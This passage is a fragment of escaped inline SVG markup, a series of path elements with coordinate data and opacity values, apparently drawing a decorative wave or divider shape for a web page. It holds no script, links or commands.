slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.